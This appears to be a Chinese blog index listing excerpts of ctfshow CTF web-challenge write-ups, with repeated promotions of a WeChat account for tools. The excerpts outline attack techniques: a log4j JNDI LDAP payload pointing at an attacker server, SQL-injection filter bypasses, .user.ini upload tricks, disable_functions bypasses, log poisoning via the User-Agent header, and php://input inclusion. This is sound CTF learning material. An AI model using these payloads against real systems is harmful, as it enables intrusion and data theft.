HAI_WD的博客

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。

ctfshow-web-红包题 葵花宝典

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。

ctfshow-web-web15 Fishman

ctfshow-web-【nl】难了

ctfshow-web-红包题 耗子尾汁

ctfshow-web-新年好

利用的话需要有一个vps，poc是：user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境，因为log4j本生就是一个jndi漏洞的利用，所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源，技能树，面试题等。log4j的payload是：${jndi:ldap://}这里选取的工具是：JNDIExploit。

本篇介绍php 字符串格式化绕过SQL注入相关知识。

文中工具皆可关注 皓月当空w 公众号 发送关键字获取。

这里有两个重点，一个是cookie，一个是本地管理员。这里涉及到了一个知识点，就是哪些头部可以判断为本地访问。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源，技能树，面试题等。

这个知识点纯粹就是为了ctf准备的，很少有系统会出现这种情况。

这里有一个坑哇，这里注册的时候密码会给你md5，数据库里存储的也是md5，所以需要我们手动修改为字符。通过url发现这里是通过order by进行了排序，测试发现一共5个字段，并且3是按照密码进行排序。那么思路就是，一个字符一个字符的去进行测试。尝试弱口令无果，可以注册，尝试注册一个账号。首先映入眼帘的是登录界面。

访问之后是一个登录页面，扫了目录，试了sql注入，没办法于是跑一跑弱口令，所以有事没事，admin弱口令跑一跑。查看一下返回包，可以看到有一个Flag字样的内容。

发现一个.git文件403，这种情况通常都是存在文件夹，但是不能直接访问文件夹导致的。那么我们可以使用git_extract工具进行获取内容。蚁剑连接一下，发现无法下载文件，disable_functions会限制一些内容。那么直接使用蚁剑插件进行绕过即可。首先上来访问就是phpinfo。常规思路先扫一下目录。wx公众号，发送关键字 git 获取。git_extract工具可以搜索。发现一个backdoor.php文件。

原理就是将上传的文件保存为flag.dat,然后进行对比，那么这种情况肯定会出现条件竞争，也就是说flag.dat在比较完第一次之后被覆盖了的话，就可以满足第二个条件。进行md5，然后就是文件md5对比，要求md5一致，但是sha512不一样，这里比较的文件是key.dat。首先跑一下字典，这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份，备份的是check.php.bak。然后接着看，可以看到这里不太可能是sql注入，有一个请求。直接访问进行下载即可。

首先看到是一个上传页面，测试其他无果，遂进行目录遍历，发现upload.php.bak文件。然后上传1.txt，尝试使用get，但是没有生效，这里需要控制字符数量。上传好了之后，通过index.php进行访问。然后通过highlight_file读取文件。那么我们先上传.user.ini。

本篇主要是讲解分析一下user.ini相关的内容。因为这个知识点涉及到文件上传的绕过。

还有一个知识点就是如果是PHP上传文件的话，会在/tmp下生成一个为phpxxxxxx的文件x为随机字母。执行之后可以看到文件代码，可以看到也是eval，但是中间对大部分的字符串都进行了过滤，留下了一个字母p。同样，先看一下有没有注释的内容，可以看到有一个cmd的入参。这里就需要知道一个知识点，php中可以通过。进行打印，相当于echo，但是必须使用。那么构造一下poc：就是。对之前的内容进行闭合。

本篇会记录一些可能会遇到的面试题，持续更新。

关于disable_functions的绕过，里面的内容就比较多了，有兴趣的师傅可以自行研究，先说这道题的做法。读取一下这个文件，这里使用highlight_file进行读取，这个内置函数的意思是将内容高亮读出来。然后尝试执行命令，无法，发现存在disable_functions，很多命令都无法执行。当然也可以通过其他方式获取内容，主打一个不懂就问。然后做一下测试，看是命令执行还是代码执行。国际惯例看一下返回包，是不是有注释。然后可以看到当前目录下有两个文件。通过蚁剑的绕过脚本可以直接处理。

这里要求输入的passwd和session必需要相当，那么我们只要让密码和session都为空即可。

WITH ROLLUP是一种在SQL查询结果中使用的特殊子句，它可用于生成分组列的总计行。使用WITH ROLLUP，可以在查询结果中添加一个额外的行，显示分组结果的总计值。也就是说如果通过with rollup分组后为空，那我们的输入也为空，那么此时就可以进行绕过了。看到这个源码，可以看到只能是通过满足下面的条件来拿到flag，并且很多关键字都被拦截了。这里需要介绍一下WITH ROLLUP。这里还是使用/**/进行绕过空格。

看到md5，参考这个https://blog.youkuaiyun.com/HAI_WD/article/details/132345156?拿到一个站的时候一定要看robots.txt文件。看到一个phps，然后下载一下。

有些零散的知识未曾关注过，偶然捡起反而更加欢喜。

那么我们需要做的就是对这两个进行绕过，空格还是用/**/进行绕过，逗号的话substr需要用到，但是substr可以用。这道题实际上就是一个单纯的布尔型盲注，只不过是过滤了一些东西，一个是过滤的空格，还有一个是过滤了逗号。最终运行一下就可以获得flag。那么我们的poc就是。

通过尝试，发现是数字型的注入，并且同样是过滤了空格。获取一下flag即可。

简单的总结一下SQL注入的内容。

然后测试看是哪一个字符触发了，测试后发现是空格会触发这个问题。发现这里出现了 sql inject error。看到是一个登录框，所以先考虑到是sql注入。那么我们可以选择使用/**/代替空格。使用通用payload进行测试。

首先看到代码，发现要求v1必须是字符串，v2必须是数字，并且对v1和v2的md5弱相等，也就是==，只比较字符串开头是否相等，那么就需要找到两个md5开头相等的即可。240610708的md5是0e462097431906509019562988736854，满足条件。那么QNKCDZO的md5是0e830400451993494058024219903391。代入参数即可获取flag。

默认nginx日志是：/var/log/nginx/access.log，可以看到记录了请求。那么我们就可以修改ua头进行代码注入，如果存在ssh连接的话，用ssh日志也可以。然后cat一下获取到flag。

php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。发现一个ctf_go_go_go的文件，然后读取就是了。这个题目一看就知道是一个文件包含漏洞。所以就可以直接执行命令。

知道这里是sql注入，确认一下是什么类型的闭合。可以知道闭合是单引号闭合，然后查一下显示的位数。这道题很多wp，但是为了完整性还是写一下。然后知道库了之后，锁定一下数据表。

通常这种题目都是在F12中的。base64解一下就得到答案。首先看到的是下图所示的内容。

本篇主要是针对不同的做题方法和思路将wp进行分类，从而更方便大家进行索引。